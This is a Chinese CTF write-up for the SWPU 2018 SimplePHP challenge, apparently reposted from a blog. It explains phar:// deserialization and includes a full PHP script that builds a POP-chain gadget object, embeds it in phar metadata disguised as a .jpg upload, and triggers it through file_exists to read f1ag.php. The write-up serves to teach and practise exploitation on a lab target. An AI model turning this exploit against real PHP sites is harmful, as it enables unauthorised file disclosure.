自学内容网 自学内容网

CTF中的phar反序列化 [SWPU 2018]SimplePHP

以[SWPU 2018]SimplePHP 这道题为例

页面可以查看文件和上传文件
点击查看文件,发现url变成/file.php?file=  猜测可能存在文件包含,可以读取文件


尝试读取index.php文件  回显了源码


再读取base.php  只看最后有信息的代码:  <!--flag is in f1ag.php-->

提示flag在f1ag.php   尝试直接读取f1ag.php  回显hacker!   f1ag被过滤了

那就读取一下file.php本身       /file.php?file=file.php     

<?php 
header("content-type:text/html;charset=utf-8");  
include 'function.php'; 
include 'class.php'; 
ini_set('open_basedir','/var/www/html/'); 
$file = $_GET["file"] ? $_GET['file'] : ""; 
if(empty($file)) { 
    echo "<h2>There is no file to show!<h2/>"; 
} 
$show = new Show(); 
if(file_exists($file)) { 
    $show->source = $file; 
    $show->_show(); 
} else if (!empty($file)){ 
    die('file doesn\'t exists.'); 
} 
?> 

发现 include 'function.php';   include 'class.php';
以及代码
ini_set('open_basedir','/var/www/html/');  //只允许访问 /var/www/html/ 及其子目录中的文件
 

读取function.php,只列出重要代码,一些代码已经添加了注释符便于理解

可以看到是定义了和文件上传有关的两个函数,先放在一边

<?php 
include "base.php"; 
function upload_file_do() {
    global $_FILES;
    $filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg";
    //mkdir("upload",0777);
    if(file_exists("upload/" . $filename)) {
        unlink($filename);
//目标位置是否存在同名文件,如果存在就删除
    }
    move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename);
    //tmp_name包含了上传文件在服务器上的临时文件路径,当用户提交表单时,PHP会自动将上传的文件保存在一个临时路径
    //move_uploaded_file()将临时存储的上传文件移动到指定的目标位置,即 upload 目录,$filename 是要移动到该目录下的新文件名
    echo '<script type="text/javascript">alert("上传成功!");</script>';
}
function upload_file_check() { 
    global $_FILES; 
    $allowed_types = array("gif","jpeg","jpg","png"); 
    $temp = explode(".",$_FILES["file"]["name"]); 
    $extension = end($temp); 
    if(empty($extension)) { 
        //echo "<h4>请选择上传的文件:" . "<h4/>"; 
    } 
    else{ 
        if(in_array($extension,$allowed_types)) { 
            return true; 
        } 
        else { 
            echo '<script type="text/javascript">alert("Invalid file!");</script>'; 
            return false; 
        } 
    } 
} 
?> 

读取class.php

<?php
class C1e4r
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = $name;
    }
    public function __destruct()
    {
        $this->test = $this->str;
        echo $this->test;
    }
}
class Show
{
    public $source;
    public $str;
    public function __construct($file)
    {
        $this->source = $file;   //$this->source = phar://phar.jpg
        echo $this->source;
    }
    public function __toString()
    {
        $content = $this->str['str']->source;
        return $content;
    }
    public function __set($key,$value)
    {
        $this->$key = $value;
    }
    public function _show()
    {
        if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
        
    }
    public function __wakeup()
    {
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
class Test
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array();
    }
    public function __get($key)
    {
        return $this->get($key);
    }
    public function get($key)
    {
        if(isset($this->params[$key])) {
            $value = $this->params[$key];
        } else {
            $value = "index.php";
        }
        return $this->file_get($value);
    }
    public function file_get($value)
    {
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}
?> 

代码审计

观察class.php源码
代码中没有反序列化函数unserialize,看起来似乎无法执行反序列化操作
发现file.php中有  if(file_exists($file)) 代码         file参数是url输入得到的,是可控的


file_exists和file_get_contents以及其他一些文件系统函数在通过phar://伪协议解析phar文件时,都会将其中的meta-data进行反序列化,即可不需要unserialize函数u也能完成反序列化操作

$this->source = $file;   //$this->source = phar://phar.jpg  这行代码也给出了phar伪协议的提示

所以如果可以构造phar文件上传,然后查看文件时的参数file传入phar伪协议,就可以触发并执行反序列化,这就是本题的解题思路

那么还有问题就是代码中没有明显可以执行命令的代码,怎样才能读取到f1ag.php的内容呢?

代码中有  $text = base64_encode(file_get_contents($value));

通过file_get_contents()函数可以读取出f1ag.php文件的内容,但是不会输出回显

发现C1e4r类中的__destruct()方法 中的 echo $this->test;  可以用来输出内容

那么解题步骤就是通过file_get_contents()函数读取出f1ag.php文件的内容,通过pop链构造正好由C1e4r类中__destruct()方法 中的 echo $this->test;  来输出读取到的文件内容,然后上传构造的phar文件,在读取文件时给参数file传入phar伪协议,让函数file_exists($file)解析phar文件中的meta-data进行反序列化操作

构造pop链:

从后向前推,最后要执行的是Test类中的file_get函数,在类中好像是叫方法,不过不讲究这么多了,

发现Test类中get函数会  return $this->file_get($value);  但是value需要是f1ag.php 不能是index.php
所以需要满足if判断,也就是让$this->params[$key])存在并且赋值为f1ag.php
而__get方法会调用get函数,同时参数也会传递给get函数

__get()方法在 读取不可访问(protected 或 private)或不存在的属性的值时被调用
Show类的__toString()方法中   $content = $this->str['str']->source;
$this->str 是一个关联数组,其中 'str' 是一个键名,即从 $this->str 数组中获取 'str' 键对应的值,
因此str可以赋值为['str'=>'new Test()'] 

Test类中没有source属性,这样就会触发__get()方法 而这里的source就会作为变量传递给$key
结合$value = $this->params[$key];  $this->params需要是一个关联数组 ['source' => 'f1ag.php']

C1e4r类中__destruct()方法会  echo $this->test;    类中test属性是str属性赋值过来的,所以把str赋值为Show类对象,就会触发__toString(),并且echo输出file_get_contents()函数读取到的/var/www/html/f1ag.php文件内容
反序列化执行之后自动触发__destruct(),完成pop链构造

Test::__get() -> Show::__toString() -> C1e4r::__destruct()

<?php
class C1e4r
{
    public $test;
    public $str;       //  3  赋值为Show类对象
}
class Show
{
    public $source;
    public $str;        //  2 str中的键名str赋值为Test类对象
}
class Test
{
    public $file;
    public $params;     // 1  赋值为['source' => '/var/www/html/f1ag.php']
}

$a=new Test;
$a->params=['source'=>'/var/www/html/f1ag.php'];
//如果直接赋值为f1ag.php没有作用
$b=new Show;
$b->str['str']=$a;
//也可以$b->str=['str'=>$a];
$c=new C1e4r;
$c->str=$b;
//echo(serialize($c));

//前面是构造的序列化字符串,后面是生成phar文件

$phar = new Phar("phar.phar"); //后缀名必须为phar,前面名称随意
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($c); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

执行代码后会生成一个phar.phar的文件

function.php中已经给出了白名单,上传的文件需要是图片后缀,改为phar.jpg

在上传文件页面上传phar.jpg

 

根据上面function中的文件上传代码,文件会被移动到upload目录下
所以url访问upload目录,找到最新时间的图片文件,复制文件名


点击查看文件,使用phar:// 伪协议查看文件
/file.php?file=phar://upload/4f33429adadb44be9532b2307be24b29.jpg


base64解码得到flag


原文地址:https://blog.csdn.net/weixin_73904941/article/details/143495490

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!